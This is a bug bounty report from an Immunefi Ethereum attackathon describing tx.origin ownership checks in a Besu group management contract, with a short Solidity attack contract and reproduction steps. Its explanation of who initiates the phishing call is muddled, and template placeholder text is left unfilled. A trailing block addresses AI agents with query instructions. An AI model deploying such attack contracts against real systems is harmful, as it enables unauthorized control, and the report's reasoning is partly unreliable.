# #37577 \[BC-Insight] \`tx.origin\` Usage in Group Management Contract Allows Phishing Attack for Unauthorized Actions **Submitted on Dec 9th 2024 at 16:37:44 UTC by @cheems for** [**Attackathon | Ethereum Protocol**](https://immunefi.com/audit-competition/ethereum-protocol-attackathon) * **Report ID:** #37577 * **Report Type:** Blockchain/DLT * **Report severity:** Insight * **Target:** * **Impacts:** * Direct loss of funds ## Description ## Brief/Intro A critical vulnerability exists in the on-chain group management contract, introduced in [PR #1288](https://github.com/hyperledger/besu/pull/1288), where `tx.origin` was used to verify the contract owner. This allows a malicious contract to impersonate the owner and bypass ownership checks, enabling unauthorized users to lock/unlock the contract or modify group membership. The issue arises from the addition of `tx.origin` as a check for ownership, which was initially introduced as part of removing the enclave key and ensuring only the creator could update the contract. ## Vulnerability Details In this PR (), the intention was to ensure that only the creator's account could add/remove members and update the management contract. However, using `tx.origin` to validate ownership exposes the contract to phishing attacks, where a malicious contract can call the vulnerable contract on behalf of the attacker. Since `tx.origin` refers to the original transaction sender, the attacker only needs to initiate the call (not execute the exploit directly), allowing them to bypass the ownership checks. ## Impact Details Provide a detailed breakdown of possible losses from an exploit, especially if there are funds at risk. This illustrates the severity of the vulnerability, but it also provides the best possible case for you to be paid the correct amount. Make sure the selected impact is within the program’s list of in-scope impacts and matches the impact you selected. ## References Add any relevant links to documentation or code ## Link to Proof of Concept ## Proof of Concept ## Proof of Concept ``` pragma solidity ^0.8.0; interface IVulnerableContract { function lock() external; function unlock() external; } contract MaliciousContract { IVulnerableContract public vulnerableContract; constructor(address _vulnerableContract) { vulnerableContract = IVulnerableContract(_vulnerableContract); } function attackLock() public { vulnerableContract.lock(); // Attack via tx.origin impersonation } function attackUnlock() public { vulnerableContract.unlock(); // Attack via tx.origin impersonation } } ``` #### **Steps to Reproduce:** 1. **Deploy the Vulnerable Contract** on a local test network. 2. **Deploy the Malicious Contract**, passing the vulnerable contract address. 3. **Call `attackLock()` or `attackUnlock()`** from the malicious contract. 4. **Verify** the contract state is locked/unlocked by the attacker. *** #### **Expected Result:** The contract should only allow the actual owner to lock/unlock or modify its state. #### **Actual Result:** The malicious contract can lock/unlock or modify the contract state due to the `tx.origin` vulnerability. *** #### **Impact:** This vulnerability allows attackers to impersonate the contract owner and perform unauthorized actions, bypassing the intended ownership checks. It can lead to unauthorized updates to the contract and loss of control over group management. *** #### **Mitigation Recommendations:** 1. **Avoid Using `tx.origin`** for ownership checks. 2. **Use `msg.sender`** for proper access control. 3. **Implement proper access control mechanisms** like `onlyOwner`. *** #### **Conclusion:** This vulnerability, introduced in PR #1288, exposes the contract to phishing attacks by using `tx.origin`. The malicious contract only needs to initiate the call, not execute the exploit directly, to bypass ownership checks. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/ethereum-protocol-or-attackathon/37577-bc-insight-tx.origin-usage-in-group-management-contract-allows-phishing-attack-for-unauthorize.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.